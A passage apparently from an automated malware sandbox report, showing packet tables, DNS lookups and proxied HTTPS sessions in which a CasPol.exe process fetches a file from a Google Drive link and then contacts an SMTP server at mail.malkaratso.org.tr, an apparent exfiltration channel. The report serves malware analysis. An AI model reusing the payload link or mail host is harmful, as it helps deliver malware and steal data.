                                              Nov 29, 2021 11:29:51.798583984 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.798791885 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.798943996 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.798979044 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799005032 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799156904 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799174070 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799195051 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799282074 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799371004 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799393892 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799407959 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799571991 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799598932 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.799618006 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.799865961 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.800143003 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.800280094 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.800292015 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.800316095 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.800508976 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.800535917 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.800833941 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.801057100 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.801209927 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.801223040 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.801251888 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.801425934 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.801455975 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.801609993 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.802006960 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.802170038 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.802181005 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.802215099 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.802417994 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.802453995 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.802658081 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.802882910 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803036928 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803143978 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803528070 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.803570986 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803765059 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803777933 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.803805113 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.803980112 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.804009914 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.804024935 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.804188013 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.804347992 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.804394960 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.804622889 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.804786921 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.804946899 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.804963112 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.804986000 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.805114985 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.805140972 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.805159092 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.805354118 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.805696011 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.805862904 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.805937052 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.805965900 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.805983067 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.806035042 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806112051 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806246042 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806391001 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.806520939 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.806591034 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806617022 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.806674957 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806791067 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.806818008 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.806998968 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.807440996 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.807574034 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.807655096 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.807689905 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.807718039 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.807780027 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.807833910 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.807903051 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.807955027 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.808092117 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.808120966 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.808140993 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.808337927 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.808363914 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.808533907 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.808760881 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.808891058 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809113979 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809294939 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.809329033 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809391022 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.809530973 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809614897 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809695959 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.809720993 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.809823036 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.809973001 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.809989929 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810219049 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.810369015 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810585022 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810594082 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.810617924 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810771942 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810820103 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.810842991 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810936928 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.810978889 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.810990095 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811005116 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811109066 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811124086 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811331034 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811479092 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811507940 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811657906 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811682940 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811883926 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811901093 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.811930895 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.811945915 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812019110 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812124968 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812172890 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812292099 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812314987 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812458038 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812474012 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812489033 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812628984 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812648058 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812664986 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812870026 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.812900066 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.812922001 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813024998 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813041925 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813056946 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813194990 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813205004 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813225985 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813322067 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813339949 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813355923 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813509941 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813550949 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813584089 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813638926 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813735962 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813793898 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.813952923 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.813977003 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814121008 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814194918 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.814220905 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814286947 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.814337969 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814364910 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.814383984 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814528942 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.814544916 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814570904 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814794064 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.814985991 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815136909 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815311909 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.815346956 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815500975 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.815536976 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815675020 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815834045 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.815862894 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.815886021 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816050053 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816056013 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816133022 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816157103 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816175938 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816210985 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816282988 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816381931 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816407919 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816562891 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816585064 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816759109 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816797018 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816817999 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.816885948 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.816993952 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817014933 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817040920 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817208052 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817217112 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817239046 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817348957 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817368984 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817478895 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817500114 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817642927 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817670107 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817816973 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817857981 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.817879915 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.817965984 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818097115 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.818128109 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818142891 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.818157911 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.818228006 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818320990 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.818334103 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818398952 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818439960 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.818470001 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.818550110 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:31:27.522155046 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.543298006 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.543541908 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.601023912 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.601380110 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.622623920 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.623333931 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.646333933 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.649240017 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.675101042 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.675163031 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.675210953 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.675245047 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.675420046 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.675462008 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.676409960 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.679398060 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.700731993 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.754939079 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.823208094 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.844513893 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.845689058 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.867321968 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.867768049 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.895950079 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.896647930 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.918113947 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.918437958 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:27.979161024 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.985239983 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:27.985666037 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.007240057 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.051774025 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.067003012 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.067085028 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.067131042 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.067179918 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:31:28.088275909 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.088325977 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.088359118 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.088390112 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.090579033 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:31:28.145605087 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:33:07.186394930 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:33:07.209364891 CET58749801212.83.130.20192.168.11.20
                                              Nov 29, 2021 11:33:07.209604979 CET49801587192.168.11.20212.83.130.20
                                              Nov 29, 2021 11:33:07.209980965 CET49801587192.168.11.20212.83.130.20

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2021 11:29:50.851100922 CET6257953192.168.11.201.1.1.1
                                              Nov 29, 2021 11:29:50.860964060 CET53625791.1.1.1192.168.11.20
                                              Nov 29, 2021 11:29:51.475315094 CET6482953192.168.11.201.1.1.1
                                              Nov 29, 2021 11:29:51.512898922 CET53648291.1.1.1192.168.11.20
                                              Nov 29, 2021 11:31:27.155812025 CET6010453192.168.11.201.1.1.1
                                              Nov 29, 2021 11:31:27.471581936 CET53601041.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 29, 2021 11:29:50.851100922 CET192.168.11.201.1.1.10x60caStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                              Nov 29, 2021 11:29:51.475315094 CET192.168.11.201.1.1.10x5f39Standard query (0)doc-0s-7o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                              Nov 29, 2021 11:31:27.155812025 CET192.168.11.201.1.1.10xe03eStandard query (0)mail.malkaratso.org.trA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 29, 2021 11:29:50.860964060 CET1.1.1.1192.168.11.200x60caNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)
                                              Nov 29, 2021 11:29:51.512898922 CET1.1.1.1192.168.11.200x5f39No error (0)doc-0s-7o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                              Nov 29, 2021 11:29:51.512898922 CET1.1.1.1192.168.11.200x5f39No error (0)googlehosted.l.googleusercontent.com142.250.186.161A (IP address)IN (0x0001)
                                              Nov 29, 2021 11:31:27.471581936 CET1.1.1.1192.168.11.200xe03eNo error (0)mail.malkaratso.org.trmalkaratso.org.trCNAME (Canonical name)IN (0x0001)
                                              Nov 29, 2021 11:31:27.471581936 CET1.1.1.1192.168.11.200xe03eNo error (0)malkaratso.org.tr212.83.130.20A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • doc-0s-7o-docs.googleusercontent.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049798142.250.185.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-11-29 10:29:51 UTC0OUTGET /uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2021-11-29 10:29:51 UTC0INHTTP/1.1 302 Moved Temporarily
                                              Content-Type: text/html; charset=UTF-8
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 29 Nov 2021 10:29:51 GMT
                                              Location: https://doc-0s-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf11090lmqcnv11oh7kschb18unor6/1638181725000/01591657853412424088/*/1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv?e=download
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                              Content-Security-Policy: script-src 'nonce-Zt4IjmROjca718nxhW6ZAw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              Server: GSE
                                              Set-Cookie: NID=511=aRN7xqc6VC-Ri2jn-nAtctz3A7bLI8HZngcgTwrzC7dFL0pw6mBdwUcV11TSNShuHc3297EfAENjrP_dZBj02X5gm6mOxeouseF0zYHJmoyYPM5SRXDFPutCbrzgrPM9Krso74Zw4yyrah8NWl4LfnV_rySygd5eE9AsoNeUIdw; expires=Tue, 31-May-2022 10:29:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2021-11-29 10:29:51 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 73 2d 37 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 62 62 66
                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0s-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf
                                              2021-11-29 10:29:51 UTC2INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049799142.250.186.161443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
